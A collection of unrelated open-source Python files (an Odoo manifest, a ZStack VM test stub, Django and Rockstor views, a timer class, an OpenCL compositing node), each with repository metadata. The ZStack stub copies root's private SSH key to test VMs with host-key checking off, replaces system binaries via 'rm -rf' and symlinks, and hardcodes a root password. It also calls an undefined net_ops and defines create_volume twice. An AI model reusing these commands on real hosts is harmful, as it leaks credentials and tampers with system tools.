'l10n_br_base',
'resource',
],
'external_dependencies': {
'python': ['pybrasil'],
},
'data': [
'views/resource_calendar.xml',
'views/resource_calendar_leaves.xml',
'views/menu_resource_calendar.xml',
'wizard/workalendar_holiday_import.xml',
],
}
|
kmee/odoo-brazil-hr
|
l10n_br_resource/__openerp__.py
|
Python
|
agpl-3.0
| 854 | 0 |
'''
Create an unified test_stub to share test operations
@author: Youyk
'''
import os
import subprocess
import time
import uuid
import zstacklib.utils.ssh as ssh
import zstacklib.utils.jsonobject as jsonobject
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.zstack_test.zstack_test_vm as zstack_vm_header
import zstackwoodpecker.zstack_test.zstack_test_volume as zstack_volume_header
import zstackwoodpecker.zstack_test.zstack_test_eip as zstack_eip_header
import zstackwoodpecker.zstack_test.zstack_test_vip as zstack_vip_header
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
test_file = '/tmp/test.img'
TEST_TIME = 120
def check_icmp_connection_to_public_ip(vm1, pub_ip='223.5.5.5', expected_result='PASS'):
vm1_inv = vm1.get_vm()
    if expected_result == 'PASS':
        test_lib.lib_check_ping(vm1_inv, pub_ip)
    elif expected_result == 'FAIL':
with test_lib.expected_failure("ping from vm1 to public ", Exception):
test_lib.lib_check_ping(vm1_inv, pub_ip)
else:
        test_util.test_fail("The expected result should be either 'PASS' or 'FAIL'")
def create_vlan_vm_with_volume(l3_name=None, disk_offering_uuids=None, disk_number=None, session_uuid = None):
if not disk_offering_uuids:
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
disk_offering_uuids = [disk_offering.uuid]
if disk_number:
for i in range(disk_number - 1):
disk_offering_uuids.append(disk_offering.uuid)
return create_vlan_vm(l3_name, disk_offering_uuids, \
session_uuid = session_uuid)
def create_vlan_vm(l3_name=None, disk_offering_uuids=None, system_tags=None, session_uuid = None, instance_offering_uuid = None):
image_name = os.environ.get('imageName_net')
if not l3_name:
l3_name = os.environ.get('l3VlanNetworkName1')
return create_vm('vlan_vm', image_name, l3_name, \
disk_offering_uuids=disk_offering_uuids, system_tags=system_tags, \
instance_offering_uuid = instance_offering_uuid,
session_uuid = session_uuid)
def create_vm(vm_name='virt-vm', \
image_name = None, \
l3_name = None, \
instance_offering_uuid = None, \
host_uuid = None, \
disk_offering_uuids=None, system_tags=None, rootVolumeSystemTags=None, session_uuid = None):
if not image_name:
image_name = os.environ.get('imageName_net')
if not l3_name:
l3_name = os.environ.get('l3PublicNetworkName')
vm_creation_option = test_util.VmOption()
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
l3_names = l3_name.split(',')
print 'shuang: %s' % (l3_names)
l3_net_uuids = []
for l3_n in l3_names:
l3_net_uuid = test_lib.lib_get_l3_by_name(l3_n).uuid
l3_net_uuids.append(l3_net_uuid)
if not instance_offering_uuid:
instance_offering_name = os.environ.get('instanceOfferingName_s')
instance_offering_uuid = test_lib.lib_get_instance_offering_by_name(instance_offering_name).uuid
vm_creation_option.set_l3_uuids(l3_net_uuids)
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_name(vm_name)
vm_creation_option.set_system_tags(system_tags)
vm_creation_option.set_data_disk_uuids(disk_offering_uuids)
if rootVolumeSystemTags:
vm_creation_option.set_rootVolume_systemTags(rootVolumeSystemTags)
if host_uuid:
vm_creation_option.set_host_uuid(host_uuid)
vm = zstack_vm_header.ZstackTestVm()
vm.set_creation_option(vm_creation_option)
vm.create()
return vm
def create_volume(volume_creation_option=None, session_uuid = None):
if not volume_creation_option:
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
volume_creation_option = test_util.VolumeOption()
volume_creation_option.set_disk_offering_uuid(disk_offering.uuid)
volume_creation_option.set_name('vr_test_volume')
volume_creation_option.set_session_uuid(session_uuid)
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def make_ssh_no_password(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
ssh.make_ssh_no_password(vm_ip, test_lib.lib_get_vm_username(vm_inv), \
test_lib.lib_get_vm_password(vm_inv))
def execute_shell_in_process(cmd, timeout=10, logfd=None):
if not logfd:
process = subprocess.Popen(cmd, executable='/bin/sh', shell=True, universal_newlines=True)
else:
process = subprocess.Popen(cmd, executable='/bin/sh', shell=True, stdout=logfd, stderr=logfd, universal_newlines=True)
start_time = time.time()
while process.poll() is None:
curr_time = time.time()
        elapsed_time = curr_time - start_time
        if elapsed_time > timeout:
process.kill()
test_util.test_logger('[shell:] %s timeout ' % cmd)
return False
time.sleep(1)
test_util.test_logger('[shell:] %s is finished.' % cmd)
return process.returncode
def create_test_file(vm_inv, bandwidth):
'''
    The bandwidth is used to calculate the test file size,
    so that the transfer finishes within TEST_TIME seconds.
    Bandwidth unit is KB.
'''
vm_ip = vm_inv.vmNics[0].ip
file_size = bandwidth * TEST_TIME
seek_size = file_size / 1024 - 1
timeout = 10
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
cmd = '%s "dd if=/dev/zero of=%s bs=1M count=1 seek=%d"' \
% (ssh_cmd, test_file, seek_size)
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test file is not created')
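# Illustrative sketch (not part of the original module): the sizing math used
# by create_test_file() above. A 2048 KB/s cap over a TEST_TIME of 120 s gives
# a 240 MB file, written as one 1 MB block seeked to offset 239 MB.
def _example_test_file_sizing(bandwidth=2048):
    file_size = bandwidth * TEST_TIME   # in KB
    seek_size = file_size / 1024 - 1    # in MB (Python 2 integer division)
    return file_size, seek_size         # (245760, 239)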
def copy_key_file(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null /root/.ssh/id_rsa %s:/root/.ssh/id_rsa' % vm_ip
timeout = 10
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test file is not created')
def copy_pub_key_file(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null /root/.ssh/id_rsa.pub %s:/root/.ssh/id_rsa.pub' % vm_ip
timeout = 10
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test pub key file is not created')
def test_scp_vm_outbound_speed(vm_inv, bandwidth, raise_exception = True):
'''
bandwidth unit is KB
'''
timeout = TEST_TIME + 30
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s:%s /dev/null' \
% (vm_ip, test_file)
start_time = time.time()
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('scp test file failed')
end_time = time.time()
scp_time = end_time - start_time
if scp_time < TEST_TIME:
if not raise_exception:
            test_util.test_logger('network outbound QOS test failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not in effect.' % (scp_time, TEST_TIME, bandwidth))
            return False
        test_util.test_fail('network outbound QOS test failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not in effect.' % (scp_time, TEST_TIME, bandwidth))
    else:
        test_util.test_logger('network outbound QOS test passed, since the scp time: %d is bigger than the expected test time: %d. It means the bandwidth limitation: %d KB/s is in effect.' % (scp_time, TEST_TIME, bandwidth))
return True
def test_scp_vm_inbound_speed(vm_inv, bandwidth, raise_exception = True):
'''
bandwidth unit is KB
'''
timeout = TEST_TIME + 30
vm_ip = vm_inv.vmNics[0].ip
file_size = bandwidth * TEST_TIME
seek_size = file_size / 1024 - 1
cmd = 'dd if=/dev/zero of=%s bs=1M count=1 seek=%d' \
% (test_file, seek_size)
os.system(cmd)
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s %s:/dev/null' \
% (test_file, vm_ip)
start_time = time.time()
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('scp test file failed')
end_time = time.time()
os.system('rm -f %s' % test_file)
scp_time = end_time - start_time
if scp_time < TEST_TIME:
if not raise_exception:
            test_util.test_logger('network inbound QOS test failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not in effect.' % (scp_time, TEST_TIME, bandwidth))
            return False
        test_util.test_fail('network inbound QOS test failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not in effect.' % (scp_time, TEST_TIME, bandwidth))
    else:
        test_util.test_logger('network inbound QOS test passed, since the scp time: %d is bigger than the expected test time: %d. It means the bandwidth limitation: %d KB/s is in effect.' % (scp_time, TEST_TIME, bandwidth))
return True
def test_scp_outbound_speed(source_ip, target_ip, bandwidth, raise_exception = True):
'''
bandwidth unit is KB
'''
timeout = TEST_TIME + 30
cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s "scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s %s:%s"' \
% (source_ip, test_file, target_ip, test_file)
start_time = time.time()
os.system(cmd)
end_time = time.time()
scp_time = end_time - start_time
    if scp_time < TEST_TIME:
        if not raise_exception:
            test_util.test_logger('network outbound QOS test failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effective. ' % (scp_time, TEST_TIME, bandwidth))
            return False
        test_util.test_fail('network outbound QOS test failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effective. ' % (scp_time, TEST_TIME, bandwidth))
    else:
        test_util.test_logger('network outbound QOS test passed, since the scp time: %d is bigger than the expected test time: %d. It means the bandwidth limitation: %d KB/s is effective. ' % (scp_time, TEST_TIME, bandwidth))
        return True
def install_fio(vm_inv):
timeout = TEST_TIME + 30
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp /etc/yum.repos.d/zstack-internal-yum.repo root@%s:/etc/yum.repos.d/zstack-internal-yum.repo' % vm_ip
if execute_shell_in_process(cmd, timeout) != 0:
        test_util.test_fail('failed to scp zstack-internal-yum.repo.')
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
cmd = '%s "mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/epel.repo /etc"' \
% (ssh_cmd)
if execute_shell_in_process(cmd, timeout) != 0:
        test_util.test_fail('failed to move CentOS-Base.repo and epel.repo.')
cmd = '%s "yum clean metadata"' \
% (ssh_cmd)
if execute_shell_in_process(cmd, timeout) != 0:
        test_util.test_fail('failed to clean yum metadata.')
cmd = '%s "which fio || yum install -y fio --disableplugin=fastestmirror"' \
% (ssh_cmd)
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('fio installation failed.')
def test_fio_iops(vm_inv, iops, raise_exception = True):
def cleanup_log():
logfd.close()
os.system('rm -f %s' % tmp_file)
timeout = TEST_TIME + 120
vm_ip = vm_inv.vmNics[0].ip
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
cmd1 = """%s "fio -ioengine=libaio -bs=4k -direct=1 -thread -rw=write -size=256M -filename=/tmp/test1.img -name='EBS 4k write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd)
cmd2 = """%s "fio -ioengine=libaio -bs=4k -direct=1 -thread -rw=write -size=256M -filename=/tmp/test2.img -name='EBS 4k write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd)
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
logfd = open(tmp_file, 'w', 0)
#rehearsal
execute_shell_in_process(cmd1, timeout)
if execute_shell_in_process(cmd2, timeout, logfd) != 0:
logfd.close()
logfd = open(tmp_file, 'r')
        test_util.test_logger('test_fio_iops log: %s ' % '\n'.join(logfd.readlines()))
cleanup_log()
if not raise_exception:
test_util.test_logger('fio test failed.')
return False
test_util.test_fail('fio test failed.')
logfd.close()
logfd = open(tmp_file, 'r')
result_lines = logfd.readlines()
    test_util.test_logger('test_fio_iops log: %s ' % '\n'.join(result_lines))
bw=0
for line in result_lines:
if 'iops' in line:
            test_util.test_logger('test_fio_iops: %s' % line)
results = line.split()
for result in results:
if 'iops=' in result:
bw = int(float(result[5:]))
#cleanup_log()
    if bw == 0:
        if not raise_exception:
            test_util.test_logger('Did not get iops result for fio test')
            return False
        test_util.test_fail('Did not get iops result for fio test')
    # the iops cap is effective when the measured iops does not exceed the setting
    if bw <= iops:
        test_util.test_logger('disk iops: %s is <= setting: %s' % (bw, iops))
        return True
    else:
        test_util.test_logger('disk iops: %s exceeds the setting: %s' % (bw, iops))
        if raise_exception:
            test_util.test_fail('fio iops test fails')
        return False
def test_fio_bandwidth(vm_inv, bandwidth, path = '/tmp', raise_exception=True):
def cleanup_log():
logfd.close()
os.system('rm -f %s' % tmp_file)
timeout = TEST_TIME + 360
vm_ip = vm_inv.vmNics[0].ip
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
if '/dev/' in path:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=100M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=900M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
else:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=100M -filename=%s/test1.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=900M -filename=%s/test2.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
logfd = open(tmp_file, 'w', 0)
#rehearsal
execute_shell_in_process(cmd1, timeout)
if execute_shell_in_process(cmd2, timeout, logfd) != 0:
logfd.close()
logfd = open(tmp_file, 'r')
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(logfd.readlines()))
cleanup_log()
if not raise_exception:
test_util.test_logger('fio test failed.')
return False
test_util.test_fail('fio test failed.')
logfd.close()
logfd = open(tmp_file, 'r')
result_lines = logfd.readlines()
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(result_lines))
bw=0
for line in result_lines:
if 'iops' in line:
test_util.test_logger('test_fio_bandwidth: %s' % line)
results = line.split()
for result in results:
if 'bw=' in result:
if 'MB' in result:
bw = int(float(result[3:].split('MB')[0])) * 1024
else:
bw = int(float(result[3:].split('KB')[0]))
#cleanup_log()
if bw == 0:
if not raise_exception:
test_util.test_logger('Did not get bandwidth for fio test')
return False
test_util.test_fail('Did not get bandwidth for fio test')
threshold = bandwidth/1024/2
bw_up_limit = bandwidth/1024 + threshold
bw_down_limit = bandwidth/1024 - threshold
if bw > bw_down_limit and bw < bw_up_limit:
test_util.test_logger('disk bandwidth:%s is between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
return True
else:
test_util.test_logger('disk bandwidth:%s is not between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
if raise_exception:
test_util.test_fail('fio bandwidth test fails')
return False
def create_volume(volume_creation_option=None, session_uuid = None):
if not volume_creation_option:
disk_offering_uuid = res_ops.query_resource(res_ops.DISK_OFFERING)[0].uuid
volume_creation_option = test_util.VolumeOption()
volume_creation_option.set_disk_offering_uuid(disk_offering_uuid)
volume_creation_option.set_name('vr_test_volume')
volume_creation_option.set_session_uuid(session_uuid)
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def migrate_vm_to_random_host(vm, timeout = None):
test_util.test_dsc("migrate vm to random host")
target_host = test_lib.lib_find_random_host(vm.vm)
current_host = test_lib.lib_find_host_by_vm(vm.vm)
vm.migrate(target_host.uuid, timeout)
new_host = test_lib.lib_get_vm_host(vm.vm)
if not new_host:
test_util.test_fail('Not find available Hosts to do migration')
if new_host.uuid != target_host.uuid:
        test_util.test_fail('[vm:] %s did not migrate from [host:] %s to target [host:] %s, but to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid, new_host.uuid))
else:
test_util.test_logger('[vm:] %s has been migrated from [host:] %s to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid))
def create_eip(eip_name=None, vip_uuid=None, vnic_uuid=None, vm_obj=None, \
session_uuid = None):
if not vip_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_uuid = net_ops.acquire_vip(l3_uuid).uuid
eip_option = test_util.EipOption()
eip_option.set_name(eip_name)
eip_option.set_vip_uuid(vip_uuid)
eip_option.set_vm_nic_uuid(vnic_uuid)
eip_option.set_session_uuid(session_uuid)
eip = zstack_eip_header.ZstackTestEip()
eip.set_creation_option(eip_option)
if vnic_uuid and not vm_obj:
test_util.test_fail('vm_obj can not be None in create_eip() API, when setting vm_nic_uuid.')
eip.create(vm_obj)
return eip
def create_vip(vip_name=None, l3_uuid=None, session_uuid = None, required_ip=None):
if not vip_name:
vip_name = 'test vip'
if not l3_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_creation_option = test_util.VipOption()
vip_creation_option.set_name(vip_name)
vip_creation_option.set_l3_uuid(l3_uuid)
vip_creation_option.set_session_uuid(session_uuid)
vip_creation_option.set_requiredIp(required_ip)
vip = zstack_vip_header.ZstackTestVip()
vip.set_creation_option(vip_creation_option)
vip.create()
return vip
def create_vip_with_ip(vip_name=None, l3_uuid=None, required_ip=None, session_uuid = None):
if not vip_name:
vip_name = 'test vip'
if not l3_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_creation_option = test_util.VipOption()
vip_creation_option.set_name(vip_name)
vip_creation_option.set_l3_uuid(l3_uuid)
vip_creation_option.set_requiredIp(required_ip)
vip_creation_option.set_session_uuid(session_uuid)
vip = zstack_vip_header.ZstackTestVip()
vip.set_creation_option(vip_creation_option)
vip.create()
return vip
def attach_mount_volume(volume, vm, mount_point):
volume.attach(vm)
import tempfile
script_file = tempfile.NamedTemporaryFile(delete=False)
script_file.write('''
mkdir -p %s
device="/dev/`ls -ltr --file-type /dev | grep disk | awk '{print $NF}' | grep -v '[[:digit:]]' | tail -1`"
mount ${device}1 %s
''' % (mount_point, mount_point))
script_file.close()
vm_inv = vm.get_vm()
if not test_lib.lib_execute_shell_script_in_vm(vm_inv, script_file.name):
test_util.test_fail("mount operation failed in [volume:] %s in [vm:] %s" % (volume.get_volume().uuid, vm_inv.uuid))
os.unlink(script_file.name)
def time_convert(log_str):
    time_str = log_str.split()[0]+' '+log_str.split()[1]
    time_millisecond = time_str.split(',')[1]
    time_str = time_str.split(',')[0]
    time_tuple = time.strptime(time_str, "%Y-%m-%d %H:%M:%S")
    return int(time.mktime(time_tuple)*1000+int(time_millisecond))
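# e.g. a management-server log line beginning '2016-01-01 12:00:00,123 INFO ...'
# maps to time.mktime(<2016-01-01 12:00:00>) * 1000 + 123, i.e. local-epoch milliseconds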
def get_stage_time(vm_name, begin_time):
mn_server_log = "/usr/local/zstacktest/apache-tomcat/logs/management-server.log"
file_obj = open(mn_server_log)
for line in file_obj.readlines():
if line.find('APICreateVmInstanceMsg') != -1 and line.find(vm_name) != -1:
time_stamp = time_convert(line)
if int(time_stamp) >= begin_time:
api_id = line.split('{"', 1)[1].split(',')[-3].split(':')[1].strip('"')
break
    file_obj.close()
    # each stage duration is measured between the 'start executing flow' and
    # 'successfully executed flow' log lines of the corresponding flow class
    flows = ['VmImageSelectBackupStorageFlow', 'VmAllocateHostFlow',
             'VmAllocatePrimaryStorageFlow', 'LocalStorageAllocateCapacityFlow',
             'VmAllocateVolumeFlow', 'VmAllocateNicFlow',
             'VmInstantiateResourcePreFlow', 'VmCreateOnHypervisorFlow',
             'VmInstantiateResourcePostFlow']
    begin_times = dict.fromkeys(flows, 0)
    end_times = dict.fromkeys(flows, 0)
    file_obj = open(mn_server_log)
    for line in file_obj.readlines():
        if line.find(api_id) == -1 or line.find('SimpleFlowChain') == -1:
            continue
        for flow in flows:
            if line.find(flow) == -1:
                continue
            if line.find('start executing flow') != -1:
                begin_times[flow] = time_convert(line)
            elif line.find('successfully executed flow') != -1:
                end_times[flow] = time_convert(line)
    file_obj.close()
    # a stage time is only meaningful when both timestamps were found
    stage_times = []
    for flow in flows:
        if begin_times[flow] != 0 and end_times[flow] != 0:
            stage_times.append(end_times[flow] - begin_times[flow])
        else:
            stage_times.append(0)
    return stage_times
def setup_fake_df(host, total, avail):
    # replace /usr/bin/df with a stub reporting the given total/avail sizes,
    # keeping the real binary at /usr/bin/df.real so it can be restored
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/df.real")
if rsp.return_code != 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'cp /usr/bin/df /usr/bin/df.real')
used = int(total) - int(avail)
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo 'Filesystem 1K-blocks Used Available Use% Mounted on'" >/usr/bin/df.fake''')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo '/dev/vda1 %s %s %s 2%% /'" >>/usr/bin/df.fake''' % (total, used, avail))
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/df; ln -s /usr/bin/df.fake /usr/bin/df; chmod a+x /usr/bin/df')
def remove_fake_df(host):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/df.real")
if rsp.return_code == 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/df; ln -s /usr/bin/df.real /usr/bin/df')
def setup_fake_fs(host, total, path):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "mount -t tmpfs -o size=%s tmpfs %s" % (total, path))
def remove_fake_fs(host, path):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "umount %s" % (path))
def setup_fake_ceph(host, total, avail):
test_lib.lib_install_testagent_to_host(host)
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/ceph.real")
if rsp.return_code != 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'cp /usr/bin/ceph /usr/bin/ceph.real')
used = int(total) - int(avail)
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo '[ "$1 $2 $3" != "df -f json" ] && ceph.real "$@"' >/usr/bin/ceph.fake''')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo '[ "$1 $2 $3" != "df -f json" ] && exit' >>/usr/bin/ceph.fake''')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "/usr/bin/ceph.real df -f json")
df = jsonobject.loads(rsp.stdout)
df.stats.total_bytes = total
df.stats.total_avail_bytes = avail
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo ''" >>/usr/bin/ceph.fake''')
string = jsonobject.dumps(df).replace('"', '\\"')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo '%s'" >>/usr/bin/ceph.fake''' % (string))
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/ceph; ln -s /usr/bin/ceph.fake /usr/bin/ceph; chmod a+x /usr/bin/ceph')
def remove_fake_ceph(host):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/ceph.real")
if rsp.return_code == 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/ceph; ln -s /usr/bin/ceph.real /usr/bin/ceph')
def run_command_in_vm(vm_inv, command):
managerip = test_lib.lib_find_host_by_vm(vm_inv).managementIp
vm_ip = vm_inv.vmNics[0].ip
return test_lib.lib_ssh_vm_cmd_by_agent(managerip, vm_ip, 'root', 'password', command)
|
zstackio/zstack-woodpecker
|
integrationtest/vm/virt_plus/test_stub.py
|
Python
|
apache-2.0
| 33,035 | 0.007083 |
"""
Copyright (c) 2012-2020 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from smart_manager.models import CPUMetric
from smart_manager.serializers import CPUMetricSerializer
from generic_sprobe import GenericSProbeView
class CPUMetricView(GenericSProbeView):
serializer_class = CPUMetricSerializer
model_obj = CPUMetric
|
rockstor/rockstor-core
|
src/rockstor/smart_manager/views/cpu_util.py
|
Python
|
gpl-3.0
| 963 | 0 |
from django.template import Context, loader
from pokemon.models import Pokemon
from django.http import HttpResponse
from django.http import Http404
def index(request):
Pokemons = Pokemon.objects.all().order_by('id_pokemon')
t = loader.get_template('pokemon/index.html')
c = Context({
'Pokemons': Pokemons,
})
return HttpResponse(t.render(c))
def pokemon(request, id):
try:
Pkmn = Pokemon.objects.get(id_pokemon=id)
except Pokemon.DoesNotExist:
raise Http404
return HttpResponse(loader.get_template('pokemon/pokemon.html').render(Context({'Pokemon': Pkmn,})))
|
pgrimaud/django-pokedex
|
pokemon/views.py
|
Python
|
mit
| 616 | 0.008117 |
#
# Copyright (c) 2011 Red Hat, Inc.
#
# This software is licensed to you under the GNU Lesser General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (LGPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of LGPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/lgpl-2.0.txt.
#
# Jeff Ortel <jortel@redhat.com>
#
"""
The I{metrics} module defines classes and other resources
designed for collecting and reporting performance metrics.
"""
import time
from math import modf
class Timer:
def __init__(self, started=0, stopped=0):
self.started = started
self.stopped = stopped
def start(self):
self.started = time.time()
self.stopped = 0
return self
def stop(self):
if self.started > 0:
self.stopped = time.time()
return self
def duration(self):
return ( self.stopped - self.started )
def __str__(self):
if self.started == 0:
return 'not-running'
if self.started > 0 and self.stopped == 0:
return 'started: %d (running)' % self.started
duration = self.duration()
        # modf() returns (fractional, integral); jmod reorders that into
        # (whole units, thousandths) for the '%d.%.3d' format strings below
        jmod = ( lambda m : (m[1], m[0]*1000) )
if duration < 1:
ms = (duration*1000)
return '%d (ms)' % ms
if duration < 60:
m = modf(duration)
return '%d.%.3d (seconds)' % jmod(m)
m = modf(duration/60)
return '%d.%.3d (minutes)' % jmod(m)
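
if __name__ == '__main__':
    # minimal usage sketch (illustrative only; the sleep duration is arbitrary)
    t = Timer().start()
    time.sleep(0.25)
    print t.stop()  # prints something like '250 (ms)'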
|
splice/gofer
|
src/gofer/metrics.py
|
Python
|
lgpl-2.1
| 1,728 | 0.004051 |
__version_info__ = ('1', '0', '0')
__version__ = '.'.join(__version_info__)
|
bmmalone/pymisc-utils
|
pyllars/__init__.py
|
Python
|
mit
| 76 | 0 |
from copper.cop.cop_node import CopNode
import pyopencl as cl
import numpy
from PIL import Image
class COP2_Comp_Add(CopNode):
'''
This filter adds foreground over background using OpenCL
'''
type_name = "add"
category = "comps"
def __init__(self, engine, parent):
        super(COP2_Comp_Add, self).__init__(engine, parent)
self.program = engine.load_program("comp_add.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
def compute(self):
self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler(self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_add(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(),
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
)
exec_evt.wait()
class COP2_Comp_Blend(CopNode):
'''
This filter blends foreground over background using OpenCL
'''
type_name = "blend"
category = "comps"
def __init__(self, engine, parent):
        super(COP2_Comp_Blend, self).__init__(engine, parent)
self.program = engine.load_program("comp_blend.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
self.addParameter("factor", float, 0.5)
def bypass_node(self):
factor = self.parm("factor").evalAsFloat()
if factor <= 0.0:
self.log("Bypassing with node %s at input 0" % (self.input(0).path()))
return self.input(0)
if factor >= 1.0:
self.log("Bypassing with node %s at input 1" % (self.input(1).path()))
return self.input(1)
return None
def compute(self):
